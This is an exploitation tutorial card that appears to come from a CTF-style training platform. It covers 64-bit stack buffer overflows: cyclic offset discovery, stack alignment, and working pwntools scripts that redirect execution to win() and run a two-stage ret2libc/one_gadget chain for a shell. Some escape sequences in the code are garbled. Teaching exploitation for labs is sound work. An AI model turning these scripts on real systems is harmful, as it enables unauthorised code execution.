Simple Buffer Overflow Without Protections: Return Address Overwrite and Program Flow Redirection
Theory
Why This Matters
The 64-bit stack buffer overflow is the starting point for the entire ROP/ret2libc exploit class. Even experienced analysts sometimes miscalculate the RIP offset or forget the 16-byte alignment requirement, causing reliable-looking exploits to fail in unexpected ways. NICE K0168 and S0131 require a methodical approach: use cyclic patterns to find the offset precisely, understand the 64-bit stack frame layout, and apply the ret sled alignment trick before calling any libc function that uses SSE instructions. This card consolidates the correct workflow for 64-bit stack overflows without protections.
Core Concept
The x86-64 stack frame at function entry (after push rbp; mov rbp, rsp):
Higher addresses (caller's frame)
[rbp + 0x08] saved RIP <- overwrite target (8 bytes)
[rbp + 0x00] saved RBP <- 8 bytes, corrupted by overflow
[rbp - 0x08] local vars...
[rsp] (end of frame)
Lower addresses
A buffer at [rbp - N] requires exactly N bytes to fill it, plus 8 bytes for saved RBP, before reaching saved RIP. The total offset from the buffer start to saved RIP is N + 8.
Finding the offset with cyclic: pwntools generates a De Bruijn sequence — every 4-byte substring is unique. Send cyclic(200), trigger the crash, read the 4-byte value at the crash site in RIP (or from the coredump), and cyclic_find() returns the byte offset.
16-byte alignment requirement: x86_64 ABI mandates that RSP is 16-byte aligned at the point of a call instruction. Since call pushes 8 bytes (return address), the stack is then 8-byte aligned at function entry. The standard push rbp adds 8 more bytes, making RSP 16-byte aligned within the callee. When a ROP chain's ret jumps to libc functions that use movaps (SSE aligned moves), RSP must be 16-byte aligned at that ret — i.e., RSP must be 0x...0 or 0x...8 depending on where in the chain we are. The safest fix: prepend a bare ret gadget before any libc call.
Technical Deep-Dive
Step 1 — Find RIP offset with cyclic:
from pwn import *
context.arch = 'amd64'
# Generate cyclic pattern
pattern = cyclic(200)
print(f"Pattern (first 20): {pattern[:20]}")
# Send to binary; it will crash with a specific value in RIP
p = process('./simple_bof')
p.sendline(pattern)
p.wait()
# Method A: use coredump
core = Coredump('./core')
rip_val = core.rip
print(f"RIP at crash: {rip_val:#x}")
offset = cyclic_find(rip_val & 0xffffffff) # cyclic works on 4-byte substrings
print(f"Offset to saved RIP: {offset}")
# Method B: use GDB
# (gdb) run < <(python3 -c "from pwn import *; sys.stdout.buffer.write(cyclic(200))")
# (gdb) i r rip
# Then: cyclic_find(rip_value)
Step 2 — Verify offset and build payload:
from pwn import *
elf = ELF('./simple_bof')
p = process('./simple_bof')
offset = 72 # from cyclic analysis
win_addr = elf.sym['win']
ret_gadget = 0x40101a # bare ret for alignment
log.info(f'win() @ {win_addr:#x}')
# Check if win() needs alignment (if it calls any SSE-using libc function internally):
# If win() calls puts(), printf(), etc. -> alignment needed
# If win() just calls system() -> alignment needed
# Add ret_gadget before win_addr to ensure 16-byte alignment
payload = b'A' * offset
payload += p64(ret_gadget) # alignment
payload += p64(win_addr) # jump to win()
p.sendline(payload)
p.interactive()
Step 3 — Determine whether alignment is needed:
# Rule of thumb: if the payload ends with p64(libc_function) directly after p64(pop_rdi),
# the stack alignment at the call is:
# RSP was offset+8 (8-byte aligned from function ret)
# Each p64() pushes 8 bytes; after offset/8 gadgets RSP shifts by 8*N
# If offset is divisible by 16: RSP is misaligned (needs one extra ret)
# If offset is not divisible by 16: RSP is aligned (no extra ret needed)
# But this arithmetic is subtle -- always verify in GDB with "p $rsp & 0xf"
# Empirical check in GDB:
# (gdb) break system
# (gdb) run < exploit_input
# (gdb) p $rsp & 0xf
# Should be 0x0 for aligned. If 0x8: add one p64(ret_gadget) to the chain.
Complete 64-bit overflow exploit with full ASLR bypass (linking to other techniques):
from pwn import *
elf = ELF('./simple_bof')
libc = ELF('./libc.so.6')
p = process('./simple_bof')
offset = 72
pop_rdi = 0x401263
ret_gadget = 0x40101a
# Stage 1: leak libc (ret2libc.v2 technique)
payload1 = b'A' * offset
payload1 += p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])
p.sendline(payload1)
leak = u64(p.recvuntil(b'
').strip().ljust(8, b'x00'))
libc.address = leak - libc.sym['puts']
log.info(f'libc base: {libc.address:#x}')
# Stage 2: shell (ret2libc.v2 / one_gadget)
og = libc.address + 0x4f432 # one_gadget with [rsp+0x40]==NULL constraint (example)
payload2 = b'A' * offset
payload2 += p64(ret_gadget) # alignment
payload2 += p64(og)
p.sendline(payload2)
p.interactive()
Reverse Engineering Methodology
- Use
cyclic(200)→ crash →cyclic_find(rip_val)as the first step every time. Do not guess the offset from the buffer declaration without empirical verification — struct padding and compiler decisions affect the actual layout. - Confirm the offset one more time: send
b'A' * offset + b'B' * 8 + b'C' * 8and verify that RIP =0x4343434343434343(CCCCCCCC) and RBP =0x4242424242424242in GDB. - Determine alignment: in GDB, break at the target function's entry and check
$rsp & 0xf. If it is 8, you are aligned for acall(which would push 8 more bytes making it 0). If the function is reached viaret(notcall), RSP alignment afterretdepends on the chain. - Search for the bare
retgadget:ROPgadget --binary ./binary --rop | grep ": ret$". It is almost always present at a low address near the PLT stubs or function prologues.
Common Reversing Errors
cyclic_findreturning wrong offset on 64-bit: by defaultcyclic_findsearches for a 4-byte substring. On 64-bit, RIP may contain 8 bytes of the cyclic pattern. Usecyclic_find(rip_val & 0xffffffff)to search for the lower 4 bytes, or usecyclic(200, n=8)for 8-byte cyclic patterns.- Forgetting saved RBP in the offset: the layout is
[buffer][saved_RBP][saved_RIP]. Cyclic fills buffer AND saved_RBP. The offset to RIP includes the saved RBP slot (8 bytes).cyclic_findgives the offset to the start of the saved RIP slot, not the buffer end. - One-off alignment: inserting one extra
reteither fixes or breaks alignment — it shifts RSP by 8. If tworetgadgets are needed, that shifts by 16 (no net effect on alignment). If unsure, try with and without one extraretand observe in GDB. - Payload delivery truncated:
gets()terminates onx0a;fgets(buf, N, stdin)reads at most N-1 bytes. If the payload is longer than the read limit, the extra bytes are not delivered. Verify the total payload length against the read limit.
Challenge Lab
Reinforce your learning with a hands-on generated challenge based on this card's competency.